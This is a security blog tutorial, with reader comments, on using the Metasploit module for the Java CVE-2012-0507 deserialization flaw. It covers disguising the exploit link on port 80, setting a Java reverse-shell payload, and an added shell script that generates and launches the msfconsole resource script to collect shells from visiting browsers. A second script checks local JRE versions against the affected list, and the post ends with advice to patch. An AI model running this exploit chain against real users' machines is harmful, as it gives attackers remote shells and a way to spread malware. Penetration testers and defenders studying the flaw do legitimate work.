Another exploit that targets the Java SE runtime affects end users: it lets attackers distribute malware and obtain remote shells. The people behind the Metasploit Framework have created a module (java_atomicreferencearray, for CVE-2012-0507) based on part of the exploit's code.

According to Microsoft, "the vulnerability exploits a flaw in the deserialization of 'AtomicReferenceArray' objects, which allows remote attackers to call system level Java functions via the ClassLoader of a constructor that is being deserialized without proper sandboxing."

In this article we will see how to use that module to attack a remote system.

Open the Metasploit console (msfconsole) and search for the java_atomicreferencearray exploit:

Search for Java Atomic Reference Array Exploit

 

We will use this module against a test machine that has Java SE 6 Update 30 installed.

Options for the Java Exploit

 

Running the show options command to see the available settings shows two things. First, the default port the exploit server listens on is 8080, and the URI path is blank. If we use this exploit in a real penetration test against a client's employees, it is good practice to change the port to 80 and the URI path to / so that the link we send them does not raise suspicion (binding port 80 requires root privileges). Leaving the URI path blank makes Metasploit generate a random path that does not look legitimate, so our test may fail. We therefore give the exploit the following settings:

Java Exploit Settings and Payloads

 

As the payload we use a Java command shell and set LHOST to our own IP address:

Configuring the payload

 

A last run of the show options command confirms that the payload settings are configured properly:

Payload Options

 

Now it is time to run the exploit. As the image below shows, the module starts a reverse handler on our machine and then waits for a browser to connect to its HTTP server.

Execution of the Java Exploit

 

When a victim's browser requests our page, the exploit runs and, if that machine has a vulnerable version of Java, returns a shell to us. In the wild, attackers typically compromise a popular website and redirect its visitors through an iframe to the page where the exploit is hosted.

Exploiting the Vulnerability

 

List the sessions that the Java Exploit opened
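The whole procedure above (search, select the module, set port 80 and URI path /, pick the Java command shell payload, set our address, run the exploit as a job) collected into a Metasploit resource script so it can be replayed instead of typed. This is an added example, not code from the original post or from Metasploit. It assumes the module path exploit/multi/browser/java_atomicreferencearray, that the Java command shell is the inline java/shell_reverse_tcp payload, and uses 192.0.2.10 and port 4444 as placeholders for our listener.

```shell
#!/bin/sh
# Resource-script driver for the java_atomicreferencearray module with the
# settings discussed in the write-up (SRVPORT 80, URIPATH /, Java command shell).
# Example code added for this write-up, not part of Metasploit.
# Assumptions: module path exploit/multi/browser/java_atomicreferencearray,
# payload java/shell_reverse_tcp, placeholder listener 192.0.2.10:4444.

# Print the msfconsole resource script for a given listener address.
# $1 = LHOST (our address), $2 = LPORT (optional, default 4444)
gen_rc() {
    lhost="$1"
    lport="${2:-4444}"
    cat <<EOF
use exploit/multi/browser/java_atomicreferencearray
set SRVHOST 0.0.0.0
set SRVPORT 80
set URIPATH /
set PAYLOAD java/shell_reverse_tcp
set LHOST $lhost
set LPORT $lport
show options
exploit -j
EOF
}

# True if the generated script carries the exact line "set KEY VALUE".
# Usage: rc_has "$rc" SRVPORT 80
rc_has() {
    printf '%s\n' "$1" | grep -qx "set $2 $3"
}

# Write the script to a temp file and hand it to msfconsole, if installed.
# Binding port 80 needs root, so run this with sudo on the attacking box.
run_module() {
    rc=$(gen_rc "$1" "$2")
    rcfile=$(mktemp)
    printf '%s\n' "$rc" > "$rcfile"
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rcfile"
    else
        echo "msfconsole not found; resource script written to $rcfile"
    fi
}

# Show the script that would be loaded for the placeholder address.
gen_rc 192.0.2.10
```

Start it with `run_module 192.0.2.10` (as root); once a victim browser has hit the page, `sessions -l` lists the shells the module opened and `sessions -i 1` interacts with the first one.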

 

Affected Java Software

  • Java SE 7 Update 2 and earlier,
  • Java SE 6 Update 30 and earlier, and
  • Java SE 5 Update 33 and earlier
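A local check against that list, added here as example code (not part of the post or of Metasploit). It parses the first line of `java -version` output and treats the listed updates, together with any older update in the same family, as vulnerable; newer updates and families not on the list are reported as not affected. The sample version lines are constructed.

```shell
#!/bin/sh
# Local JRE version check against the affected list above.
# Example code added for this write-up, not part of Metasploit.
# Assumption: the listed updates and anything older in the same family are
# vulnerable; newer updates are treated as fixed.

# Pull the quoted version out of the first line of `java -version` output,
# e.g.  java version "1.6.0_30"  ->  1.6.0_30
parse_java_version() {
    printf '%s\n' "$1" | sed -n 's/.*"\([^"]*\)".*/\1/p'
}

# Return 0 if the version is on the affected list, 1 if it is newer than the
# listed update, 2 if the major family is not on the list at all.
java_vulnerable() {
    v="$1"
    family=$(printf '%s' "$v" | cut -d. -f2)      # 1.6.0_30 -> 6
    case "$v" in
        *_*) update=${v##*_} ;;                    # 1.6.0_30 -> 30
        *)   update=0 ;;                           # no update suffix: GA build
    esac
    case "$family" in
        7) [ "$update" -le 2 ] ;;
        6) [ "$update" -le 30 ] ;;
        5) [ "$update" -le 33 ] ;;
        *) return 2 ;;
    esac
}

# Check the JRE on this host, if one is on PATH.
check_local_java() {
    if ! command -v java >/dev/null 2>&1; then
        echo "no java on PATH"
        return 0
    fi
    line=$(java -version 2>&1 | head -n 1)
    v=$(parse_java_version "$line")
    if java_vulnerable "$v"; then
        echo "VULNERABLE: $v (patch the JRE)"
    else
        echo "not on the affected list: $v"
    fi
}

# Constructed sample lines in the format `java -version` prints them.
for line in 'java version "1.6.0_30"' 'java version "1.7.0_03"' 'java version "1.5.0_22"'; do
    v=$(parse_java_version "$line")
    if java_vulnerable "$v"; then
        echo "$v: vulnerable"
    else
        echo "$v: not on the affected list"
    fi
done
```

Run `check_local_java` on each workstation in scope; as the comments below note, there is no reliable way to fingerprint the JRE version remotely, so an authenticated check like this is how you find out before the test.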

 

Conclusion

This vulnerability exists because the deserialization of AtomicReferenceArray does not properly check that the wrapped array is of the expected object type. Most attackers use this exploit to distribute malware to victim machines. At the time of writing only two antivirus products, McAfee and NOD32, detect this attack, and because the JRE is cross-platform it affects Windows, Linux and Mac OS X alike, so patch your Java runtime environment to protect your systems from it.

References

http://www.securityfocus.com/bid/52161/info

http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Exploit:Java/CVE-2012-0507.A

http://blog.eset.com/2012/03/30/blackhole-cve-2012-0507-and-carberp

13 Comments

  1. Good point. You cannot determine that remotely. Attackers are just using other websites in order to redirect the traffic to a new page and they are hoping that some of the users will run vulnerable versions of the JRE in order to exploit them. That's why they are choosing websites that have high traffic. In a white-box test maybe you will have that information, if it is inside the scope.

    1. That's what I thought. You can probably infer it by accessing other available services. If any Java apps are running via HTTP, you can assume it has SOME version of Java, but I have also never heard of any way of remotely fingerprinting Java versions. :)
      cheers

  2. Hello,

    When trying to execute under metasploit I get an error that CVE-2012-0507.jar is missing. What am I doing wrong?

  3. If you are using BackTrack 5 R2, stop the Apache server first and then try to run the exploit. Also have a look at the directory /opt/metasploit/msf3/data/exploits to see if CVE-2012-0507.jar exists. If for some reason the .jar file is not there, I can upload it to a hosting site so you can take it and put it in the exploit folder. Let us know what happened.
